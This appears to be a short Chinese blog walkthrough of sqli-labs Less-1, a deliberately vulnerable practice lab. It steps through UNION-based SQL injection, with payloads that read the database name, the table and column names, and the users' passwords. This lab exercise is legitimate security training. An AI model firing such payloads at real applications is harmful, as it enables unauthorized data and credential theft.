sqli-labs-master/Less-1
判断闭合 加单引号出现错误
--+注释 页面正常 闭合方式为单引号
布尔判断 and 1=1 页面正常
and 1=2 页面异常 存在注入
order by 判断有几列
order by 3 页面显示正常
order by 4 页面异常 表示存在3列
联合查询 union select 判断回显位置
id=-1' union select 1,2,3 --+ (id给一个不存在的值)
回显位置为2,3
查看库名和用户名
id=-1' union select 1,database(),user() --+
联合查询通过内置库查询当前数据库使用的表
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
联合查询通过内置库查询当前数据库使用的表中的列
id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
查询表中所有的数据
id=-1' union select 1,2,group_concat(id,'usernam',password) from users --+
未完待续。。。
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
